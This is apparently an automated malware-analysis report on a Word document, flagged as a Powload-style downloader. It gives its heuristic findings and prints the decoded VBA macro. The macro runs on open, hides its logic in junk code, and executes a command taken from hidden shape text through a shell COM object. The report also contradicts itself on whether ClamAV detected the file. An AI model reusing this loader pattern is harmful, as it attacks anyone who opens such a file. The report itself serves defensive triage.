MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK
T1059.003 Windows Command Shell
T1203 Exploitation for Client Execution
The sample contains VBA macros that are designed to execute obfuscated commands via cmd.exe. Specifically, the AutoOpen macro attempts to construct and run a complex command string that appears to download and execute a second-stage payload. The use of WScript.Shell CLSID further indicates malicious intent to interact with the system.
Heuristics (9)
- ClamAV: Doc.Malware.Powload-6775323-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Powload-6775323-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS: VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: `End Select Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt) On Error Resume Next`
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
  Matched line in script: `End Select Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt) On Error Resume Next`
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro
  Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD: Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6806 bytes |

SHA-256: 59096927f01063a6d531abc24a0efba110199dbba5e8d713edde060972cd362e

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (109 of 163 identifiers look randomly generated, e.g. 'NarmvINMqnkL' — consistent with name-mangling obfuscation)
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "qLWJVzw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case EdnbV
Case 171915710
Hmozd = 252445714
vKITZfT = CLng(53884184)
Case 32346758
zsUGkILW = Oct(PQKIKvSBC)
QqKmAppSm = diwYDbcG
Case 320116756
idbkWKk = CDate(zYGiR)
otpFTQ = Int(307001358 * ZjPjUlEiS)
End Select
On Error Resume Next
Select Case pwQwHwzdR
Case 147208844
mQMuHBZw = 276619519
RjWXGq = CLng(249665415)
Case 90566389
jBDlYYO = Oct(iifWOcKcJ)
JFWhnFj = NtaBHLP
Case 304863865
jiinVtHu = CDate(KrCHMv)
MbIACOwBA = Int(75997176 * TdWTHUp)
End Select
Set iNnPa = Shapes("NarmvINMqnkL")
On Error Resume Next
Select Case uaZBYjXFa
Case 2309754
pFHla = 205503100
kfYiITV = CLng(129520066)
Case 291203322
FaAwDSLU = Oct(lfQGI)
dHRPES = jMQOYMRF
Case 207604940
rkAzz = CDate(mnvRZ)
zUYPTfMDE = Int(263971796 * Pqoiouw)
End Select
cYarBTAmPGi = "" + fcIAP + wpJtlt + aYWIO + DPkJK + iNnPa.TextFrame.TextRange.Text + szOfnWvB + BLYbf
On Error Resume Next
Select Case bwCDpzB
Case 46729088
iOYKDUS = 154742898
BVcLLdXR = CLng(210548936)
Case 12300487
OzboO = Oct(WAAEh)
ihROR = lpWAZccz
Case 105486520
ZfYTzzPi = CDate(kwzwRWkU)
witOGj = Int(305416970 * lNawMR)
End Select
On Error Resume Next
Select Case Whjlq
Case 342307649
DsQwrp = 129312861
PimJGi = CLng(193695721)
Case 94406064
kCBfZlX = Oct(qRQjSTwXN)
UaFMQ = CwXBPrbsS
Case 49718789
nwldG = CDate(wBXDkzPnl)
ZIoXXlKdd = Int(92171677 * kzqXNKS)
End Select
On Error Resume Next
Select Case hPwhkLi
Case 111619465
TaBzMnzh = 272522927
bSoGsvat = CLng(136070643)
Case 270553890
zNjCM = Oct(JDBmZbQ)
ivdhu = BuEQC
Case 297611781
GmKRN = CDate(jWMUuzS)
dnwCrYzK = Int(338806946 * LanzDJQAT)
End Select
Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
On Error Resume Next
Select Case hNILcORwj
Case 272614853
iPEBQiVV = 110422557
IXJpcq = CLng(192569596)
Case 45411639
fKhua = Oct(WpShWM)
JMJLuG = VjnufZq
Case 338584135
AYnpiKZ = CDate(Udjtp)
otCuN = Int(321273322 * RvWkfvXn)
End Select
On Error Resume Next
Select Case niKHWz
Case 62712291
TQjUBr = 299574856
mjzzwP = CLng(28373123)
Case 133794171
ZzFZrHkb = Oct(ziAlnX)
WTwUaBaO = szUJMY
Case 175096216
awAEqbJws = CDate(sLKBsbMbw)
zGYXq = Int(54366830 * JPSzbHKKq)
End Select
On Error Resume Next
Select Case TqSuVzPp
Case 254953312
SRzFA = 18554173
ToXFNuKo = CLng(174765228)
Case 214726531
vMFcRRj = Oct(jJHwp)
qSuXnvG = hBabj
Case 44710062
IFvQtuZAq = CDate(iZATiMpif)
bPRmkOt = Int(204209981 * CqkZE)
End Select
On Error Resume Next
Select Case ILHuLLkSf
Case 35205140
XWQJQwWn = 95169026
AtrnN = CLng(51610355)
Case 130353324
zVZwREj = Oct(QStXnW)
wLDYzUWF = wqISPHwD
Case 112630638
fjPbELcBj = CDate(urSdL)
cJiUFdQrz = Int(179830947 * OzJTpGwqw)
End Select
Const wMizh = 0
On Error Resume Next
Select Case rFitF
Case 69091941
CImbX = 64553337
UEOAaa = CLng(117841373)
Case 256185431
OkQhQWAo = Oct(ThKAoRPHS)
wzQQiZKpJ = iLlEaUIoc
Case 254955387
IzjEcGUP = CDate(lTIRqhwUm)
FhrrR = Int(47664962 * FZUIaifTn)
End Select
On Error Resume Next
Select Case wPYnm
Case 153911123
UfjfS = 111806296
klvkoQG = CLng(78309060)
Case 316795503
pzNNtR = Oct(zRwFz)
aSEGBpA = sOpdX
Case 184530810
piAmTEzpJ = CDate(bNbfASVl)
VRjKF = Int(146015791 * SwiYjVpRK)
End Select
SKNLli.Run! cYarBTAmPGi, wMizh
On Error Resume Next
Select Case PuhqtZM
Case 99214300
wvzkicV = 303259403
CjINH = CLng(288308409)
Case 118798962
wYYaIh = Oct(NLBSQ)
bGQfpzpUm = msKuS
Case 100331047
mqYhb = CDate(qDpOzWTa)
dNaZs = Int(226264793 * tcrLRm)
End Select
On Error Resume Next
Select Case FEcrjzVY
Case 68880352
VWtVOWSwi = 159733432
XZVLL = CLng(50446225)
Case 204684516
iTqmaJ = Oct(DIOvSmdfc)
nsuMWRcG = iiGfUrp
Case 31625011
iijTMVSJ = CDate(jFOtusfX)
kGIBNf = Int(314139097 * OzctEch)
End Select
On Error Resume Next
Select Case SGSKm
Case 298416984
kESCTnbpu = 207580043
TjwWHJIYZ = CLng(59435681)
Case 137644640
cssnE = Oct(BmJzXl)
CoHdzUQwr = sKvwJBOU
Case 232688174
zqJbAW = CDate(ttlWLKW)
VBuco = Int(26556528 * lJzcIO)
End Select
On Error Resume Next
Select Case HjwSdjVD
Case 247477994
ltJQHiE = 34883385
fVuOTK = CLng(62508234)
Case 31716602
wiCqw = Oct(iYDItirw)
PHcjElL = LpQLNS
Case 187534503
UiUEH = CDate(vviljbv)
hnWYwL = Int(221072836 * AOnNqAh)
End Select
On Error Resume Next
Select Case XjaYisz
Case 311681866
ZfuOYk = 306694237
TSuutlcKv = CLng(166535911)
Case 292192121
clEtD = Oct(wUULp)
mtnPX = FuqmQ
Case 62710060
jizwO = CDate(TEvqnaAK)
naXIdo = Int(51301277 * wMmqTzJpU)
End Select
End Sub